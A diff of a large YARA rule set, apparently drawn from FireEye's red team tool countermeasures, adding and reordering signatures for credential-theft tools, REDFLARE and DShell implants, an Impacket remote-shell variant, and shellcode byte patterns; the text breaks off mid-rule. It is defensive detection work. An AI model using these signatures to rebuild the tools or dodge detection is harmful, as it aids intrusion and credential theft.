= "execute" ascii wide - $str8 = "WinRM" ascii wide - $str9 = "SchtaskMod" ascii wide - $str10 = "PoisonHandler" ascii wide - $str11 = "SCShell" ascii wide - $str12 = "SchtaskMod" ascii wide - $str13 = "ServiceHijack" ascii wide - $str14 = "commandArg" ascii wide - $str15 = "payloadPath" ascii wide - $str16 = "Schtask" ascii wide - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $msil and all of ($str*) -} rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_1 : FILE { meta: @@ -125623,66 +127888,66 @@ rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_1 : FILE condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_2 : FILE +rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_2 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "a3b12fd7-e82d-5ef0-9125-7c069cd9bec4" - date = "2020-12-02" - date = "2020-12-02" + id = "b6103e23-8d1c-5d01-b283-f4545ccb924e" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_2.yar#L4-L23" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_2.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "6efb58cf54d1bb45c057efcfbbd68a93" - logic_hash = "e2dc7db1860eef04a569f007c32abd507dd588d1392613efbb31f42ca66ff735" + logic_hash = "e7282905a8baeaeb8ec156171fbf2bc4ac811facb80959a88394f4938a145cc1" score = 50 quality = 75 tags = "FILE" rev = 1 strings: - $s1 = "LDAP://" wide - $s2 = "[GPP] Searching for passwords now..." wide - $s3 = "Searching Group Policy Preferences (Get-GPPPasswords + Get-GPPAutologons)!" wide - $s4 = "possibilities so far)..." wide - $s5 = "\\groups.xml" wide - $s6 = "Found interesting file:" wide - $s7 = "\x00GetDirectories\x00" - $s8 = "\x00DirectoryInfo\x00" + $pdb1 = "\\ADPassHunt\\" + $pdb2 = "\\ADPassHunt.pdb" + $s1 = "Usage: .\\ADPassHunt.exe" + $s2 = "[ADA] Searching for accounts with msSFU30Password attribute" + $s3 = "[ADA] Searching for accounts with userpassword attribute" + $s4 = "[GPP] Searching for passwords now" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ((@pdb2[1]<@pdb1[1]+50) or 2 of ($s*)) } -rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_2 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_2 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "b6103e23-8d1c-5d01-b283-f4545ccb924e" - date = "2020-12-09" + id = "a3b12fd7-e82d-5ef0-9125-7c069cd9bec4" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_2.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_2.yar#L4-L23" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "6efb58cf54d1bb45c057efcfbbd68a93" - logic_hash = "e7282905a8baeaeb8ec156171fbf2bc4ac811facb80959a88394f4938a145cc1" + logic_hash = "e2dc7db1860eef04a569f007c32abd507dd588d1392613efbb31f42ca66ff735" score = 50 quality = 75 tags = "FILE" rev = 1 strings: - $pdb1 = "\\ADPassHunt\\" - $pdb2 = "\\ADPassHunt.pdb" - $s1 = "Usage: .\\ADPassHunt.exe" - $s2 = "[ADA] Searching for accounts with msSFU30Password attribute" - $s3 = "[ADA] Searching for accounts with userpassword attribute" - $s4 = "[GPP] Searching for passwords now" + $s1 = "LDAP://" wide + $s2 = "[GPP] Searching for passwords now..." wide + $s3 = "Searching Group Policy Preferences (Get-GPPPasswords + Get-GPPAutologons)!" wide + $s4 = "possibilities so far)..." wide + $s5 = "\\groups.xml" wide + $s6 = "Found interesting file:" wide + $s7 = "\x00GetDirectories\x00" + $s8 = "\x00DirectoryInfo\x00" condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ((@pdb2[1]<@pdb1[1]+50) or 2 of ($s*)) + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_1 : FILE { @@ -125708,1127 +127973,730 @@ rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_1 : FILE condition: uint16(0)==0x5A4D and $typelibguid } -rule FIREEYE_RT_Tool_MSIL_Csharputils_1 : FILE +rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_1 { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CSharpUtils' project." + description = "smbexec" author = "FireEye" - id = "a0e8c45a-759a-5611-aa2a-3113a75fb651" - date = "2020-12-09" + id = "992d1132-3136-5e1b-a1ef-dcdf36ebf0f5" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPUTILS/production/yara/Tool_MSIL_CSharpUtils_1.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Smbexec)/production/yara/HackTool_PY_ImpacketObfuscation_1.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "11dfd44fb4ee1e610c2e4a941b3a1e88eafc30a2a2237529150e73bceb2a1324" + hash = "0b1e512afe24c31531d6db6b47bac8ee" + logic_hash = "45a4c0426b29b8c8bede9c4e8292131da7e756d48fc3ac4a07d08fd52383d21e" score = 75 - quality = 65 - tags = "FILE" + quality = 75 + tags = "" rev = 1 strings: - $typelibguid0 = "2130bcd9-7dd8-4565-8414-323ec533448d" ascii nocase wide - $typelibguid1 = "319228f0-2c55-4ce1-ae87-9e21d7db1e40" ascii nocase wide - $typelibguid2 = "4471fef9-84f5-4ddd-bc0c-31f2f3e0db9e" ascii nocase wide - $typelibguid3 = "5c3bf9db-1167-4ef7-b04c-1d90a094f5c3" ascii nocase wide - $typelibguid4 = "ea383a0f-81d5-4fa8-8c57-a950da17e031" ascii nocase wide + $s1 = "class CMDEXEC" nocase + $s2 = "class RemoteShell" nocase + $s3 = "self.services_names" + $s4 = "import random" + $s6 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]%CoMSpEC%[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase + $s7 = /self\.__serviceName[\x09\x20]{0,32}=[\x09\x20]{0,32}self\.services_names\[random\.randint\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}len\(self\.services_names\)[\x09\x20]{0,32}-[\x09\x20]{0,32}1\)\]/ condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_NOAMCI_1 : FILE +rule FIREEYE_RT_APT_Trojan_Linux_REDFLARE_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'noamci' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "48066258-528f-5a70-81e1-15d6dfd9ff4f" - date = "2020-12-09" + id = "220302bc-4ed3-5e10-9bd2-a8ed2bdaef73" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NOAMCI/production/yara/APT_HackTool_MSIL_NOAMCI_1.yar#L4-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Linux_REDFLARE_1.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "6278cfb4e9af20bbe943f4b99227c7fba276315a9f0059575b3ed4ef96a848c4" + hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e" + logic_hash = "282f11c4c86d88d05f11e92f5483701d9a54c2dd39f21316cd271aa78a338d0f" score = 75 - quality = 71 + quality = 75 tags = "FILE" - rev = 4 + rev = 1 strings: - $typelibguid0 = "7bcccf21-7ecd-4fd4-8f77-06d461fd4d51" ascii nocase wide - $typelibguid1 = "ef86214e-54de-41c3-b27f-efc61d0accc3" ascii nocase wide + $s1 = "find_applet_by_name" fullword + $s2 = "bb_basename" fullword + $s3 = "hk_printf_chk" fullword + $s4 = "runCommand" fullword + $s5 = "initialize" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint32(0)==0x464c457f) and all of them } -rule FIREEYE_RT_Loader_MSIL_Netshshellcoderunner_1 : FILE +rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_6 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NetshShellCodeRunner' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "b3521812-7ea3-5f80-89bd-3bdd71b687f2" - date = "2020-12-09" + id = "5875a9ec-c3ee-57f0-a430-4443db585def" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETSHSHELLCODERUNNER/production/yara/Loader_MSIL_NetshShellCodeRunner_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Win_REDFLARE_6.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "97f6475a9d42697f633e06a9b04a85021ca4920145eb4af257d71b431448f0e9" + hash = "294b1e229c3b1efce29b162e7b3be0ab, 6902862bd81da402e7ac70856afbe6a2" + logic_hash = "1e6f8320e0c0b601fc72fa4d9c61e46adfbcd84638c97da5988ca848e036312a" score = 75 - quality = 73 + quality = 75 tags = "FILE" rev = 2 strings: - $typelibguid0 = "49c045bc-59bb-4a00-85c3-4beb59b2ee12" ascii nocase wide + $s1 = "RevertToSelf" fullword + $s2 = "Unsuccessful" fullword + $s3 = "Successful" fullword + $s4 = "runCommand" fullword + $s5 = "initialize" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Loader_Win32_Dshell_1 : FILE +rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_5 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "dad763bd-0e4a-542a-9920-ece11d23ce24" - date = "2020-11-27" - date = "2020-11-27" + id = "892981d6-f310-5ee8-95b5-dd4bd720a86c" + date = "2020-12-01" + date = "2020-12-01" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_1.yar#L4-L20" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_5.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "12c3566761495b8353f67298f15b882c" - logic_hash = "79643f9c252765647d80f6fe1ee7bb698fbc6a6c3a0ff1fd819a09bff031907c" + hash = "dfbb1b988c239ade4c23856e42d4127b, 3322fba40c4de7e3de0fda1123b0bf5d" + logic_hash = "ab38e5ebded026829672941709797b40f8e13fb244b6a8ed3545de4358f727b8" score = 75 quality = 75 tags = "FILE" - rev = 1 + rev = 3 strings: - $sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 } - $sb2 = { FF 7? 0C B? [4-16] FF 7? 08 5? [0-12] E8 [4] 84 C0 74 05 B? 01 00 00 00 [0-16] 80 F2 01 0F 84 } - $ss1 = "\x00CreateThread\x00" - $ss2 = "base64.d" fullword - $ss3 = "core.sys.windows" fullword + $s1 = "AdjustTokenPrivileges" fullword + $s2 = "LookupPrivilegeValueW" fullword + $s3 = "ImpersonateLoggedOnUser" fullword + $s4 = "runCommand" fullword + $steal_token = { FF 15 [4] 85 C0 [1-40] C7 44 24 ?? 01 00 00 00 [0-20] C7 44 24 ?? 02 00 00 00 [0-20] FF 15 [4] FF [1-5] 85 C0 [4-40] 00 04 00 00 FF 15 [4-5] 85 C0 [2-20] ( BA 0F 00 00 00 | 6A 0F ) [1-4] FF 15 [4] 85 C0 74 [1-20] FF 15 [4] 85 C0 74 [1-20] ( 6A 0B | B9 0B 00 00 00 ) E8 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Loader_Win32_Dshell_3 : FILE +rule FIREEYE_RT_APT_Builder_PY_REDFLARE_1 { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "6b6fccef-ac93-5f1b-b9b6-c2d3ee4d8da7" + id = "3b5ad25d-ce66-572e-9a91-40a73b8fd447" date = "2020-11-27" date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_3.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Builder_PY_REDFLARE_1.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "12c3566761495b8353f67298f15b882c" - logic_hash = "ec2a8b0abc6cb6d1861199b892fbe84782b42babb08e3ea203d10ab17ff7a20a" + hash = "d0a830403e56ebaa4bfbe87dbfdee44f" + logic_hash = "1948cadb7242eb69bffbc222802ce9c1af38d7a846da09b6343b1449fe054e42" score = 75 quality = 75 - tags = "FILE" + tags = "" rev = 1 strings: - $sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 } - $ss1 = "\x00CreateThread\x00" - $ss2 = "base64.d" fullword - $ss3 = "core.sys.windows" fullword + $1 = "LOAD_OFFSET_32 = 0x612" + $2 = "LOAD_OFFSET_64 = 0x611" + $3 = "class RC4:" + $4 = "struct.pack('<Q' if is64b else '<L'" + $5 = "stagerConfig['comms']['config']" + $6 = "_x86.dll" + $7 = "_x64.dll" condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them + all of them and @1[1]<@2[1] and @2[1]<@3[1] and @3[1]<@4[1] and @4[1]<@5[1] } -rule FIREEYE_RT_APT_Loader_Win32_Dshell_2 : FILE +rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "ae34d547-d979-5ce2-bcf8-a5b4e4567de3" + id = "dc162f26-66d3-5359-b1d7-ef2208b359e2" date = "2020-11-27" date = "2020-11-27" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_2.yar#L4-L21" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_1.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "590d98bb74879b52b97d8a158af912af" - logic_hash = "958ff45add46c0a43e839e8007c1d9296ee89ddd8c045b8ec6b031b225207a6c" + hash = "f20824fa6e5c81e3804419f108445368" + logic_hash = "2cae245a6aa36dccc2228cccefdc4ca0eb278901f063e072a369000f67d73a55" score = 75 quality = 75 tags = "FILE" - rev = 2 - - strings: - $sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 } - $ss1 = "\x00CreateThread\x00" - $ss2 = "base64.d" fullword - $ss3 = "core.sys.windows" fullword - $ss4 = "C:\\Users\\config.ini" fullword - $ss5 = "Invalid config file" fullword - - condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x010B) and all of them -} -rule FIREEYE_RT_APT_Backdoor_Win_Dshell_2 : FILE -{ - meta: - description = "This rule looks for strings specific to the D programming language in combination with a selection of Windows functions that are present within a DShell payload" - author = "FireEye" - id = "538e150f-0fb9-5a85-9299-9b4a57f8a606" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/supplemental/yara/APT_Backdoor_Win_DShell_2.yar#L4-L132" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "e0683f8ee787313cfd2c61cd0995a830" - logic_hash = "2b4d33c17cac35153346002c48457d9b46010f1c052df632c647c22c8d96b54c" - score = 60 - quality = 20 - tags = "FILE" - rev = 4 - - strings: - $dlang1 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\utf.d" ascii wide - $dlang2 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\file.d" ascii wide - $dlang3 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\format.d" ascii wide - $dlang4 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\base64.d" ascii wide - $dlang5 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\stdio.d" ascii wide - $dlang6 = "\\..\\..\\src\\phobos\\std\\utf.d" ascii wide - $dlang7 = "\\..\\..\\src\\phobos\\std\\file.d" ascii wide - $dlang8 = "\\..\\..\\src\\phobos\\std\\format.d" ascii wide - $dlang9 = "\\..\\..\\src\\phobos\\std\\base64.d" ascii wide - $dlang10 = "\\..\\..\\src\\phobos\\std\\stdio.d" ascii wide - $dlang11 = "Unexpected '\\n' when converting from type const(char)[] to type int" ascii wide - $ign1 = "--strip-comments" - $ign2 = "Usage: rdmd [RDMD AND DMD OPTIONS]" - $s1 = "CloseHandle" - $s2 = "CommandLineToArgvW" - $s3 = "CreateFileA" - $s4 = "CreateSemaphoreA" - $s5 = "CreateThread" - $s6 = "DeleteCriticalSection" - $s7 = "DeleteFileA" - $s8 = "DuplicateHandle" - $s9 = "EnterCriticalSection" - $s10 = "ExitProcess" - $s11 = "ExitThread" - $s12 = "ExpandEnvironmentStringsW" - $s13 = "FileTimeToDosDateTime" - $s14 = "FindClose" - $s15 = "FindFirstFileA" - $s16 = "FindFirstFileW" - $s17 = "FindNextFileA" - $s18 = "FindNextFileW" - $s19 = "FormatMessageW" - $s20 = "FreeEnvironmentStringsA" - $s21 = "FreeEnvironmentStringsW" - $s22 = "FreeLibrary" - $s23 = "GetACP" - $s24 = "GetCPInfo" - $s25 = "GetCommandLineA" - $s26 = "GetCommandLineW" - $s27 = "GetConsoleOutputCP" - $s28 = "GetConsoleScreenBufferInfo" - $s29 = "GetCurrentProcess" - $s30 = "GetCurrentThread" - $s31 = "GetCurrentThreadId" - $s32 = "GetEnvironmentStrings" - $s33 = "GetEnvironmentStringsW" - $s34 = "GetEnvironmentVariableA" - $s35 = "GetEnvironmentVariableW" - $s36 = "GetExitCodeThread" - $s37 = "GetFileAttributesW" - $s38 = "GetFileType" - $s39 = "GetLastError" - $s40 = "GetModuleFileNameA" - $s41 = "GetModuleHandleA" - $s42 = "GetOEMCP" - $s43 = "GetProcAddress" - $s44 = "GetProcessHeap" - $s45 = "GetStdHandle" - $s46 = "GetStringTypeA" - $s47 = "GetSystemInfo" - $s48 = "GetThreadContext" - $s49 = "GetTickCount" - $s50 = "GetTimeZoneInformation" - $s51 = "GetVersion" - $s52 = "GlobalAlloc" - $s53 = "GlobalFree" - $s54 = "GlobalMemoryStatus" - $s55 = "HeapAlloc" - $s56 = "HeapFree" - $s57 = "HeapReAlloc" - $s58 = "InitializeCriticalSection" - $s59 = "IsDebuggerPresent" - $s60 = "LCMapStringA" - $s61 = "LeaveCriticalSection" - $s62 = "LoadLibraryA" - $s63 = "LoadLibraryW" - $s64 = "LocalFree" - $s65 = "MessageBoxA" - $s66 = "MultiByteToWideChar" - $s67 = "QueryPerformanceCounter" - $s68 = "QueryPerformanceFrequency" - $s69 = "RaiseException" - $s70 = "ReadFile" - $s71 = "RegCloseKey" - $s72 = "RegCreateKeyExW" - $s73 = "RegDeleteKeyW" - $s74 = "RegDeleteValueW" - $s75 = "RegEnumKeyExW" - $s76 = "RegEnumValueW" - $s77 = "RegFlushKey" - $s78 = "RegOpenKeyExW" - $s79 = "RegOpenKeyW" - $s80 = "RegQueryInfoKeyW" - $s81 = "RegQueryValueExW" - $s82 = "RegSetValueExW" - $s83 = "ReleaseSemaphore" - $s84 = "ResumeThread" - $s85 = "RtlCaptureContext" - $s86 = "RtlUnwind" - $s87 = "SetConsoleCtrlHandler" - $s88 = "SetEnvironmentVariableW" - $s89 = "SetFilePointer" - $s90 = "SetHandleCount" - $s91 = "SetLastError" - $s92 = "Sleep" - $s93 = "SuspendThread" - $s94 = "SwitchToThread" - $s95 = "SystemTimeToTzSpecificLocalTime" - $s96 = "TryEnterCriticalSection" - $s97 = "TzSpecificLocalTimeToSystemTime" - $s98 = "UnhandledExceptionFilter" - $s99 = "VirtualAlloc" - $s100 = "VirtualFree" - $s101 = "WaitForSingleObject" - $s102 = "WideCharToMultiByte" - $s103 = "WriteConsoleA" - $s104 = "WriteFile" - $s105 = "lstrlenW" - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and filesize >500KB and filesize >700KB and all of ($s*) and 1 of ($dlang*) and not $ign1 and not $ign2 -} -rule FIREEYE_RT_Builder_MSIL_Sinfuloffice_1 : FILE -{ - meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SinfulOffice' project." - author = "FireEye" - id = "cf020fb3-751b-5346-8c0d-dc0a552599a3" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/production/yara/Builder_MSIL_SinfulOffice_1.yar#L4-L15" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "b5d49a8720e4daa21e95ec66299daec42e65906017de886ea91f7bb6bfb04c77" - score = 75 - quality = 73 - tags = "FILE" rev = 1 strings: - $typelibguid0 = "9940e18f-e3c7-450f-801a-07dd534ccb9a" ascii nocase wide - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them -} -rule FIREEYE_RT_Methodology_OLE_CHARENCODING_2 : FILE -{ - meta: - description = "Looking for suspicious char encoding" - author = "FireEye" - id = "7abd1a11-7a55-50ac-aa6b-537e7c59a5ab" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/supplemental/yara/Methodology_OLE_CHARENCODING_2.yar#L4-L23" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "41b70737fa8dda75d5e95c82699c2e9b" - logic_hash = "20843295531dfd88934fe0902a5101c5c0828e82df3289d7f263f16df9c92324" - score = 65 - quality = 75 - tags = "FILE" - rev = 4 - - strings: - $echo1 = "101;99;104;111;32;111;102;102;" ascii wide - $echo2 = "101:99:104:111:32:111:102:102:" ascii wide - $echo3 = "101x99x104x111x32x111x102x102x" ascii wide - $pe1 = "77;90;144;" ascii wide - $pe2 = "77:90:144:" ascii wide - $pe3 = "77x90x144x" ascii wide - $pk1 = "80;75;3;4;" ascii wide - $pk2 = "80:75:3:4:" ascii wide - $pk3 = "80x75x3x4x" ascii wide - - condition: - ( uint32(0)==0xe011cfd0) and filesize <10MB and any of them -} -rule FIREEYE_RT_Hacktool_Win32_Andrewspecial_1 : FILE -{ - meta: - description = "No description has been set in the source file - FireEye-RT" - author = "FireEye" - id = "69e27e92-d68e-5543-bada-170e32733dbb" - date = "2020-11-25" - date = "2020-11-25" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TITOSPECIAL/production/yara/HackTool_Win32_AndrewSpecial_1.yar#L4-L18" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "e89efa88e3fda86be48c0cc8f2ef7230" - logic_hash = "529a49fb21250069111d03a174901dc2e1623ee2a1f446aae1bdb1579a227dd3" - score = 75 - quality = 75 - tags = "FILE" - rev = 4 - - strings: - $dump = { 6A 00 68 FF FF 1F 00 FF 15 [4] 89 45 ?? 83 [2] 00 [1-50] 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 10 68 [4] FF 15 [4] 89 45 [10-70] 6A 00 6A 00 6A 00 6A 02 8B [2-4] 5? 8B [2-4] 5? 8B [2-4] 5? E8 [4-20] FF 15 } - $shellcode_x86 = { B8 3C 00 00 00 33 C9 8D 54 24 04 64 FF 15 C0 00 00 00 83 C4 04 C2 14 00 } - $shellcode_x86_inline = { C6 45 ?? B8 C6 45 ?? 3C C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 33 C6 45 ?? C9 C6 45 ?? 8D C6 45 ?? 54 C6 45 ?? 24 C6 45 ?? 04 C6 45 ?? 64 C6 45 ?? FF C6 45 ?? 15 C6 45 ?? C0 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 00 C6 45 ?? 83 C6 45 ?? C4 C6 45 ?? 04 C6 45 ?? C2 C6 45 ?? 14 C6 45 